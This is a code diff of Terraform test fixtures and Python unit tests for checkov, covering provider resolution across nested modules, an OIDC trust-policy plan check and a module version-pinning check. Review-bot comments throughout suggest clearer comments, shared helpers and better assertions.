"sts.amazonaws.com" + ] + }, + "thumbprint_list": { + "constant_value": [ + "cf23df2207d99a74fbe169e3eba035e633b65d94" + ] + }, + "url": { + "constant_value": "https://accounts.google.com" + } + }, + "schema_version": 0 + }, + { + "address": "aws_iam_role.r6", + "mode": "managed", + "type": "aws_iam_role", + "name": "r6", + "provider_config_key": "aws", + "expressions": { + "assume_role_policy": { + "references": [ + "data.aws_iam_policy_document.r4", + "each.key" + ] + }, + "force_detach_policies": { + "constant_value": true + }, + "inline_policy": [ + { + "name": { + "constant_value": "eks_s3_access" + }, + "policy": { + "references": [ + "each.value" + ] + } + } + ], + 
"name": { + "references": [ + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.app_k8s_namespace" + ] + } + }, + { + "address": "aws_iam_role.r1", + "mode": "managed", + "type": "aws_iam_role", + "name": "r1", + "provider_config_key": "aws", + "expressions": { + "assume_role_policy": { + "references": [ + "data.aws_iam_policy_document.r3", + "each.key" + ] + }, + "force_detach_policies": { + "constant_value": true + }, + "inline_policy": [ + { + "name": { + "constant_value": "eks_s3_access" + }, + "policy": { + "references": [ + "each.value" + ] + } + } + ], + "name": { + "references": [ + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.app_k8s_namespace" + ] + } + }, + { + "address": "data.aws_iam_policy_document.r4", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "r4", + "provider_config_key": "aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "sts:AssumeRoleWithWebIdentity" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "references": [ + "each.value" + ] + }, + "variable": { + "references": [ + "aws_iam_openid_connect_provider.r5.url", + "aws_iam_openid_connect_provider.r5" + ] + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "sts.amazonaws.com" + ] + }, + "variable": { + "references": [ + "aws_iam_openid_connect_provider.r5.url", + "aws_iam_openid_connect_provider.r5" + ] + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "cognito-identity.amazonaws.com" + ] + }, + "type": { + "constant_value": "Federated" + } + } + ] + } + ] + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.app_k8s_namespace" + ] + } + }, + { + "address": "data.aws_iam_policy_document.r3", + "mode": "data", + "type": 
"aws_iam_policy_document", + "name": "r3", + "provider_config_key": "aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "sts:AssumeRoleWithWebIdentity" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "references": [ + "each.value" + ] + }, + "variable": { + "references": [ + "aws_iam_openid_connect_provider.r5.url", + "aws_iam_openid_connect_provider.r5" + ] + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "sts.amazonaws.com" + ] + }, + "variable": { + "references": [ + "aws_iam_openid_connect_provider.r5.url", + "aws_iam_openid_connect_provider.r5" + ] + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "references": [ + "aws_iam_openid_connect_provider.r5.arn", + "aws_iam_openid_connect_provider.r5" + ] + }, + "type": { + "constant_value": "Federated" + } + } + ] + } + ] + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.app_k8s_namespace" + ] + } + } + ], + "variables": { + "app_k8s_namespace": { + "default": [ + "p2", + "p1" + ] + } + } + } + } + } + } + }, + "relevant_attributes": [ + { + "resource": "module.poc.aws_iam_openid_connect_provider.r5", + "attribute": [ + "url" + ] + }, + { + "resource": "module.poc.aws_iam_openid_connect_provider.r5", + "attribute": [ + "arn" + ] + }, + { + "resource": "module.poc.data.aws_iam_policy_document.r4", + "attribute": [] + }, + { + "resource": "module.poc.data.aws_iam_policy_document.r3", + "attribute": [] + } + ], + "timestamp": "123" +} diff --git a/tests/terraform/checks/data/aws/example_ModuleProvider/example/main.tf b/tests/terraform/checks/data/aws/example_ModuleProvider/example/main.tf new file mode 100644 index 00000000000..3eade85d3c6 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_ModuleProvider/example/main.tf 
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
new file mode 100644
index 00000000000..c8e43ad69cf
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_ModuleProvider/main.tf
@@ -0,0 +1,15 @@
+provider "aws" {
+ region = "us-west-1"
+}
+provider "aws" {
+ alias = "usw2"
+ region = "us-west-2"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+ source = "./example"
+ providers = {
+ aws = aws.usw2
+ }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf
new file mode 100644
index 00000000000..3eade85d3c6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/example/main.tf
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf
new file mode 100644
index 00000000000..ddf9c45c4e8
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_module_with_one_provider/main.tf
@@ -0,0 +1,8 @@
+provider "aws" {
+ region = "us-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+ source = "./example"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf
new file mode 100644
index 00000000000..002a92686d3
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/main.tf
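Review bot: The comment `# The resources in the Provider block are not explicitly associated to this resource.` above `module "example"` in example_ModuleProvider/main.tf is hard to follow: it sits above a module call rather than a resource, and what the fixture actually exercises is that the resources inside `./example` declare no provider and inherit one from the caller. Suggest `# resources inside ./example declare no provider; they must inherit aws.usw2 through the providers map` here, and `# resources inside ./example declare no provider; they must inherit the root default aws provider` in example_module_with_one_provider/main.tf. The same sentence recurs unchanged in example_provider_with_nested_module/main.tf and example_provider_with_nested_module_assign_provider/main.tf and would benefit from the same rewording.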
@@ -0,0 +1,24 @@
+provider "aws" {
+ region = "us-west-1"
+ skip_credentials_validation = true
+ skip_requesting_account_id = true
+ skip_metadata_api_check = true
+# s3_force_path_style = true
+ access_key = "mock_access_key"
+ secret_key = "mock_secret_key"
+}
+
+module "level1" {
+ source = "./nesting"
+ }
+
+
+module "level1_2" {
+ source = "./nesting_2"
+ }
+
+
+resource "aws_s3_bucket_object" "this_file_2" {
+ bucket = "your_bucket_name"
+ key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf
new file mode 100644
index 00000000000..444b2c0b0f3
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/main.tf
@@ -0,0 +1,41 @@
+provider "aws" {
+ region = "us-west-1"
+ skip_credentials_validation = true
+ skip_requesting_account_id = true
+ skip_metadata_api_check = true
+# s3_force_path_style = true
+ access_key = "mock_access_key"
+ secret_key = "mock_secret_key"
+}
+
+provider "aws" {
+ region = "eu-west-1"
+ alias = "eu_west"
+ skip_credentials_validation = true
+ skip_requesting_account_id = true
+ skip_metadata_api_check = true
+# s3_force_path_style = true
+ access_key = "mock_access_key"
+ secret_key = "mock_secret_key"
+}
+
+module "level2" {
+ source = "./nesting_l2"
+}
+
+module "level2_2" {
+ source = "./nesting_l2_2"
+ providers = {
+ aws = aws.eu_west
+ }
+}
+
+
+
+
+resource "aws_s3_bucket_object" "this_other_file" {
+ bucket = "your_bucket_name"
+ key = "key"
+ source = "source"
+
+}
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf
new file mode 100644
index 00000000000..c9ba64cc40f
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2/main.tf
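Review bot: The `access_key = "mock_access_key"` / `secret_key = "mock_secret_key"` pairs in the provider blocks of example_provider_edge_case/main.tf and nesting/main.tf are credential-shaped literals with nothing in the fixture saying they are placeholders; a repository-wide secret scan (this project's own secrets framework included) may flag them and a reader may wonder whether they matter to the test. Either drop the two attributes — the tests that consume this fixture read only `__provider_address__` and `__address__`, so they appear unused, please confirm — or mark them, e.g. `# placeholder credentials for the parser fixture only; never valid`. The commented-out `# s3_force_path_style = true` line repeated in all three provider blocks is dead configuration and should either be removed or get a reason. As a style point, the `module "level1"` and `module "level1_2"` blocks close with an indented `  }` while every other block in these fixtures closes at column 0.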
@@ -0,0 +1,5 @@
+
+resource "aws_s3_bucket_object" "this_file_2" {
+ bucket = "your_bucket_name"
+ key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf
new file mode 100644
index 00000000000..c9ba64cc40f
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting/nesting_l2_2/main.tf
@@ -0,0 +1,5 @@
+
+resource "aws_s3_bucket_object" "this_file_2" {
+ bucket = "your_bucket_name"
+ key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf
new file mode 100644
index 00000000000..c9ba64cc40f
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/nesting_2/main.tf
@@ -0,0 +1,5 @@
+
+resource "aws_s3_bucket_object" "this_file_2" {
+ bucket = "your_bucket_name"
+ key = "some_key"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md
new file mode 100644
index 00000000000..c145246bc89
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_edge_case/readme.md
@@ -0,0 +1,27 @@
+Resources by Address:
+
+File: /main.tf:21-24
+- aws_s3_bucket_object.this_file_2
+ - Expected `__provider_address__` == "aws.default"
+ - Result: aws.default
+
+File: /nesting/main.tf:36-41
+- module.level1.aws_s3_bucket_object.this_other_file
+ - Expected `__provider_address__` == "module.level1.aws.default"
+ - Result: aws.default
+
+
+File: /nesting/nesting_l2/main.tf:2-5
+- module.level1.module.level2.aws_s3_bucket_object.this_file_2
+ - Expected: `__provider_address__` == "module.level1.aws.default"
+ - Result: __provider_address__ does not exist
+
+File: /nesting/nesting_l2_2/main.tf:2-5
+- module.level1.module.level2_2.aws_s3_bucket_object.this_file_2
+ - Expected: `__provider_address__` == "module.level1.aws.eu_west"
+ - Result: aws.eu_west
+
+File: /nesting_2/main.tf:2-5
+- module.level1_2.aws_s3_bucket_object.this_file_2
+ - Expected: `__provider_address__` == "aws.default"
+ - Result: aws.default
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf
new file mode 100644
index 00000000000..a701ffbe4f6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/example2/main.tf
@@ -0,0 +1,12 @@
+provider "abbey" {
+}
+
+provider "aws" {
+ region = ""
+ alias = "aaa"
+}
+
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+ provider = "aws.aaa"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf
new file mode 100644
index 00000000000..d62ddb0b0e1
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/example/main.tf
@@ -0,0 +1,3 @@
+module "example2" {
+ source = "./example2"
+}
\ No newline at end of file
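Review bot: `provider = "aws.aaa"` in example_provider_with_nested_module/example/example2/main.tf uses the quoted reference form, while example_provider_without_module/main.tf in the same commit writes the reference unquoted as `provider = aws.usw1`. If the quoted spelling is deliberately under test (the parser must resolve both forms) a comment saying so would stop the next contributor from "fixing" it; otherwise align it with the unquoted form. The empty `provider "abbey" {}` block is also unexplained — presumably it checks that an unrelated provider is not resolved as the aws resource's provider — so `# unrelated provider: must not be picked as this resource's provider` would record that intent.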
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf
new file mode 100644
index 00000000000..ddf9c45c4e8
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module/main.tf
@@ -0,0 +1,8 @@
+provider "aws" {
+ region = "us-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+ source = "./example"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf
new file mode 100644
index 00000000000..3eade85d3c6
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf
@@ -0,0 +1,3 @@
+resource "aws_s3_bucket" "bucket"{
+ bucket = "module-bucket"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf
new file mode 100644
index 00000000000..d62ddb0b0e1
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf
@@ -0,0 +1,3 @@
+module "example2" {
+ source = "./example2"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf
new file mode 100644
index 00000000000..88ee09cea82
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf
@@ -0,0 +1,16 @@
+provider "aws" {
+ region = "us-west-1"
+}
+
+provider "aws" {
+ region = "eu-west-1"
+ alias = "eu-west-1"
+}
+
+# The resources in the Provider block are not explicitly associated to this resource.
+module "example" {
+ source = "./example"
+ providers = {
+ aws = aws.eu-west-1
+ }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/example_provider_without_module/main.tf b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf
new file mode 100644
index 00000000000..e63ccd104d1
--- /dev/null
+++ b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf
@@ -0,0 +1,17 @@
+provider "aws" {
+ region = "usw2"
+}
+
+provider "aws" {
+ alias = "usw1"
+ region = ""
+}
+
+resource "aws_s3_bucket" "bucket"{
+ bucket = "bucket"
+ provider = aws.usw1
+}
+
+resource "aws_s3_bucket" "bucket_2" {
+ bucket = "bucket-2"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py b/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py
index aa26d542671..0eaff40f31c 100644
--- a/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py
+++ b/tests/terraform/checks/data/aws/test_GithubActionsOIDCTrustPolicy.py
@@ -1,9 +1,11 @@
+import os
 import unittest
 from pathlib import Path
 from checkov.runner_filter import RunnerFilter
 from checkov.terraform.checks.data.aws.GithubActionsOIDCTrustPolicy import check
 from checkov.terraform.runner import Runner
+from checkov.terraform.plan_runner import Runner as PlanRunner
 class TestGithubActionsOIDCTrustPolicy(unittest.TestCase):
@@ -35,6 +37,30 @@ def test(self):
 self.assertEqual(passing_resources, passed_check_resources)
 self.assertEqual(failing_resources, failed_check_resources)
+ def test_terraform_plan(self):
+ runner = PlanRunner()
+ current_dir = os.path.dirname(os.path.realpath(__file__))
+
+ test_files_path = current_dir + "/example_GithubActionsOIDCTrustPolicy/tfplan.json"
+ report = runner.run(files=[test_files_path], runner_filter=RunnerFilter(checks=[check.id]))
+ summary = report.get_summary()
+
+ passing_resources = {
+ 'module.poc.data.aws_iam_policy_document.r4["p1"]',
+ 'module.poc.data.aws_iam_policy_document.r4["p2"]',
+ 'module.poc.data.aws_iam_policy_document.r3["p1"]',
+ 'module.poc.data.aws_iam_policy_document.r3["p2"]',
+ }
+
+ passed_check_resources = set([c.resource for c in report.passed_checks])
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], 0)
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
+
 if __name__ == "__main__":
 unittest.main()
diff --git a/tests/terraform/checks/data/aws/test_ModuleProvider.py b/tests/terraform/checks/data/aws/test_ModuleProvider.py
new file mode 100644
index 00000000000..099672ab004
--- /dev/null
+++ b/tests/terraform/checks/data/aws/test_ModuleProvider.py
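Review bot: `test_terraform_plan` builds the fixture path with `os.path.dirname(os.path.realpath(__file__))` and string concatenation although `Path` is already imported and used by the sibling `test` method; `test_files_path = Path(__file__).parent / "example_GithubActionsOIDCTrustPolicy" / "tfplan.json"` together with `runner.run(files=[str(test_files_path)], runner_filter=RunnerFilter(checks=[check.id]))` keeps one path style in the file and makes the `import os` added in the first hunk unnecessary. Likewise `set([c.resource for c in report.passed_checks])` can be the set comprehension `{c.resource for c in report.passed_checks}` that the new test_RevisionVersionTag.py in this commit already uses. The enclosing class starts outside the hunk.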
@@ -0,0 +1,96 @@
+import unittest
+from pathlib import Path
+
+from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
+from checkov.terraform.tf_parser import TFParser
+
+
+class TestModuleProvider(unittest.TestCase):
+ def test_module_with_two_providers(self):
+ test_files_dir = Path(__file__).parent / "example_ModuleProvider"
+
+ hcl_config_parser = TFParser()
+ module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+ local_graph = TerraformLocalGraph(module)
+ local_graph.build_graph(True)
+
+ assert len(local_graph.edges) == 2
+ assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].attributes.get('__address__')
+ assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].config['aws'].get('__address__')
+ assert local_graph.edges[0].origin == 1 and local_graph.edges[0].dest == 3
+ assert local_graph.edges[1].origin == 0 and local_graph.edges[1].dest == 3
+
+ def test_module_with_one_def_provider(self):
+ test_files_dir = Path(__file__).parent / "example_module_with_one_provider"
+
+ hcl_config_parser = TFParser()
+ module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+ local_graph = TerraformLocalGraph(module)
+ local_graph.build_graph(True)
+
+ resource_provider_address = local_graph.vertices[0].attributes.get('__provider_address__')
+ default_provider_address_from_module = local_graph.vertices[2].attributes.get('__address__')
+
+ assert resource_provider_address == default_provider_address_from_module
+
+ def test_resource_with_def_provider(self):
+ test_files_dir = Path(__file__).parent / "example_provider_without_module"
+
+ hcl_config_parser = TFParser()
+ module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+ local_graph = TerraformLocalGraph(module)
+ local_graph.build_graph(True)
+
+ # assert resource with provider ref.
+ resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__')
+ provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__')
+ assert resource_provider_address_with_alias == provider_address_with_alias
+
+ # assert resource without ref to the default provider
+ resource_provider_address_default = local_graph.vertices[3].attributes.get('__provider_address__')
+ provider_address_default = local_graph.vertices[0].attributes.get('__address__')
+ assert resource_provider_address_default == provider_address_default
+
+ def test_provider_nested_module(self):
+ test_files_dir = Path(__file__).parent / "example_provider_with_nested_module"
+
+ hcl_config_parser = TFParser()
+ module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+ local_graph = TerraformLocalGraph(module)
+ local_graph.build_graph(True)
+
+ # assert resource with provider ref.
+ resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__')
+ provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__')
+ assert resource_provider_address_with_alias == provider_address_with_alias
+
+ def test_example_provider_with_nested_module_assign_provider(self):
+ test_files_dir = Path(__file__).parent / "example_provider_with_nested_module_assign_provider"
+
+ hcl_config_parser = TFParser()
+ module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+ local_graph = TerraformLocalGraph(module)
+ local_graph.build_graph(True)
+
+ # assert resource with provider ref.
+ resource_provider_address_with_alias = local_graph.vertices[0].attributes.get('__provider_address__')
+ provider_address_with_alias = local_graph.vertices[4].attributes.get('__address__')
+ assert resource_provider_address_with_alias == provider_address_with_alias
+
+ def test_provider_edge_cases(self):
+ test_files_dir = Path(__file__).parent / "example_provider_edge_case"
+
+ hcl_config_parser = TFParser()
+ module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM')
+ local_graph = TerraformLocalGraph(module)
+ local_graph.build_graph(True)
+
+ assert local_graph.vertices[3].attributes.get('__provider_address__') == "aws.default"
+ assert local_graph.vertices[8].attributes.get('__provider_address__') == "module.level1.aws.default"
+ assert local_graph.vertices[9].attributes.get('__provider_address__') == "module.level1.aws.default"
+ assert local_graph.vertices[10].attributes.get('__provider_address__') == "module.level1.aws.eu_west"
+ assert local_graph.vertices[11].attributes.get('__provider_address__') == "aws.default"
+
+
+if __name__ == "__main__":
+ unittest.main()
diff --git a/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py b/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py
index 63b3a472a1d..6ab2ab610f4 100644
--- a/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py
+++ b/tests/terraform/checks/data/aws/test_ResourcePolicyDocument.py
@@ -7,6 +7,11 @@ class TestResourcePolicyDocument(unittest.TestCase):
+ def setUp(self):
+ from checkov.terraform.checks.utils.base_cloudsplaining_iam_scanner import BaseTerraformCloudsplainingIAMScanner
+ # needs to be reset, because the cache belongs to the class not instance
+ BaseTerraformCloudsplainingIAMScanner.policy_document_cache = {}
+
 def test(self):
 test_files_dir = Path(__file__).parent / "example_ResourcePolicyDocument"
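Review bot: Every test in test_ModuleProvider.py repeats the same four-line parse-and-build sequence and then asserts with bare `assert` on hard-coded vertex positions (`vertices[0]`, `[3]`, `[8]`…), so any change in the order the parser emits vertices breaks all six tests at once with an unhelpful `AssertionError`; inside a `unittest.TestCase` the sibling tests in this commit use `self.assertEqual`, which at least prints both values. A small `_build_graph` helper removes the duplication, and a comment at each index-based lookup should state which fixture block the index is assumed to refer to, since nothing in the test names it. The readme added to example_provider_edge_case records `Result: aws.default` and `__provider_address__ does not exist` for the two `module.level1` resources while `test_provider_edge_cases` asserts `"module.level1.aws.default"` for `vertices[8]` and `[9]`; if the readme documents the behaviour before this change it should say so or be updated, otherwise the test and the readme disagree.
```python
    def _build_graph(self, example_dir):
        # shared fixture setup: parse the example folder and build its local graph
        test_files_dir = Path(__file__).parent / example_dir
        module, _ = TFParser().parse_hcl_module(test_files_dir, source='TERRAFORM')
        local_graph = TerraformLocalGraph(module)
        local_graph.build_graph(True)
        return local_graph

    def test_module_with_one_def_provider(self):
        local_graph = self._build_graph("example_module_with_one_provider")

        # NOTE(review): index positions are assumed from the fixture
        # ([0] the module's bucket resource, [2] the root default aws provider) -- confirm
        resource_provider_address = local_graph.vertices[0].attributes.get('__provider_address__')
        default_provider_address_from_module = local_graph.vertices[2].attributes.get('__address__')

        self.assertEqual(resource_provider_address, default_provider_address_from_module)

    # ... unchanged: the other five tests, rewritten the same way ...
```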
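Review bot: The new `setUp` resets the class-level `BaseTerraformCloudsplainingIAMScanner.policy_document_cache` before each test but leaves whatever the test populated in place afterwards, so the shared dict still leaks into whichever test module runs next in the same process; registering the reset as a cleanup as well keeps the state symmetric: `self.addCleanup(setattr, BaseTerraformCloudsplainingIAMScanner, "policy_document_cache", {})`. The function-scope import looks deliberate — the file's module-level imports are outside the hunk — so if it avoids an import cycle a short comment such as `# imported here to avoid a circular import at module load` would record that. The enclosing class starts outside the hunk.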
diff --git a/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf
new file mode 100644
index 00000000000..74862c9a265
--- /dev/null
+++ b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf
@@ -0,0 +1,106 @@
+# pass
+
+module "hash" {
+ source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=26c38a66f12e7c6c93b6a2ba127ad68981a48671"
+
+ name = "my-vpc"
+ cidr = "10.0.0.0/16"
+
+ azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"]
+ private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+ public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"]
+
+ enable_nat_gateway = true
+ enable_vpn_gateway = true
+
+ tags = {
+ Terraform = "true"
+ Environment = "dev"
+ }
+}
+
+module "sub_dir_hash" {
+ source = "git::https://github.com/terraform-aws-modules/terraform-aws-cloudwatch.git//modules/log-group?ref=60cf981e0f1ae033699e5b274440867e48289967"
+
+ name = "git"
+ retention_in_days = 120
+}
+
+module "tag" {
+ source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=v5.0.0"
+
+ name = "my-vpc"
+ cidr = "10.0.0.0/16"
+
+ azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"]
+ private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+ public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"]
+
+ enable_nat_gateway = true
+ enable_vpn_gateway = true
+
+ tags = {
+ Terraform = "true"
+ Environment = "dev"
+ }
+}
+
+module "shallow_clone" {
+ source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?depth=1&ref=v1.2.0"
+}
+
+module "module_with_version" {
+ source = "terraform-aws-modules/iam/aws//modules/iam-github-oidc-role"
+ version = "5.39.1"
+}
+
+# fail
+
+module "tf_registry_no_version" {
+ source = "terraform-aws-modules/cloudwatch/aws//modules/log-group"
+}
+
+module "looks_like_a_branch" {
+ source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=some_branch_name"
+
+ name = "my-vpc"
+ cidr = "10.0.0.0/16"
+
+ azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"]
+ private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
+ public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"]
+
+ enable_nat_gateway = true
+ enable_vpn_gateway = true
+
+ tags = {
+ Terraform = "true"
+ Environment = "dev"
+ }
+}
+
+module "github_module" {
+ source = "github.com/hashicorp/example"
+}
+
+module "bitbucket_module" {
+ source = "bitbucket.org/hashicorp/terraform-consul-aws"
+}
+
+module "github_ssh_module" {
+ source = "git@github.com:hashicorp/example.git"
+}
+
+module "generic_git_module" {
+ source = "git::https://example.com/vpc.git"
+}
+
+# unknown
+
+module "relative" {
+ source = "./example"
+}
+
+module "backtrack" {
+ source = "../example"
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/module/generic/test_RevisionVersionTag.py b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py
new file mode 100644
index 00000000000..ec9031f9550
--- /dev/null
+++ b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py
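Review bot: The `# pass` group puts `ref=v5.0.0` (`tag`) and `depth=1&ref=v1.2.0` (`shallow_clone`) on the same footing as the full commit hashes in `hash` and `sub_dir_hash`, but a git tag is a movable reference whereas only the hash form is immutable; without a note, a reader may take the fixture as saying that tags pin a module as strongly as a hash. Suggest a comment on the `tag` block, `# a version tag satisfies the check, but unlike a commit hash it can be moved upstream`, and a matching one on `shallow_clone`. The `# unknown` heading is also unexplained — presumably local-path sources are outside the check's scope and produce no result at all — so `# local sources are not evaluated by the check` on that group would document the expected outcome.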
@@ -0,0 +1,50 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.module.generic.RevisionVersionTag import check
+from checkov.terraform.runner import Runner
+
+
+class TestRevisionVersionTag(unittest.TestCase):
+ def test(self):
+ # given
+ test_files_dir = Path(__file__).parent / "example_RevisionVersionTag"
+
+ # when
+ report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+ # then
+ summary = report.get_summary()
+
+ passing_resources = {
+ "hash",
+ "sub_dir_hash",
+ "tag",
+ "shallow_clone",
+ "module_with_version"
+ }
+
+ failing_resources = {
+ "looks_like_a_branch",
+ "tf_registry_no_version",
+ "generic_git_module",
+ "bitbucket_module",
+ "github_ssh_module",
+ "github_module"
+ }
+
+ passed_check_resources = {c.resource for c in report.passed_checks}
+ failed_check_resources = {c.resource for c in report.failed_checks}
+
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
+ self.assertEqual(summary["skipped"], 0)
+ self.assertEqual(summary["parsing_errors"], 0)
+
+ self.assertEqual(passing_resources, passed_check_resources)
